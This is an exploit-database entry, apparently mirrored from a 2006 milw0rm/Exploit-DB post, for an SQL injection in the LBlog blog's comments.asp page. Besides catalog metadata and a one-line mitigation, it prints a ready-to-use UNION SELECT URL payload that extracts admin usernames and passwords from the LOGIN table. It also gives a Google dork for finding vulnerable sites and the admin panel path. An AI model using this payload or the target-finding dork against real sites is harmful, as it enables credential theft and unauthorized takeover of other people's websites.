header-logo
Suggest Exploit
vendor:
LBlog
by:
Chironex Fleckeri
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: LBlog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

LBlog <= "comments.asp" SQL Injection Exploit

This exploit allows an attacker to inject malicious SQL code into the vulnerable "comments.asp" page of the LBlog application. The attacker can then use this vulnerability to gain access to the admin panel of the application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

################################################################################
##                                                                            ##

##  LBlog <= "comments.asp" SQL Injection Exploit                             ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##  Credit by        |  Chironex Fleckeri                                     ##

##  Mail             |  ChironeX.FleckeriX@Gmail.Com                          ##

##  Googledork       |  Powered By LBlog                                      ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##                                                                            ##
################################################################################

###################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
###################################################################################################################

#################################################
#Admin Panel : http://www.target.com/path/admin #
#################################################

# milw0rm.com [2006-08-20]

Navigation

Suggest Exploit

Services By CQR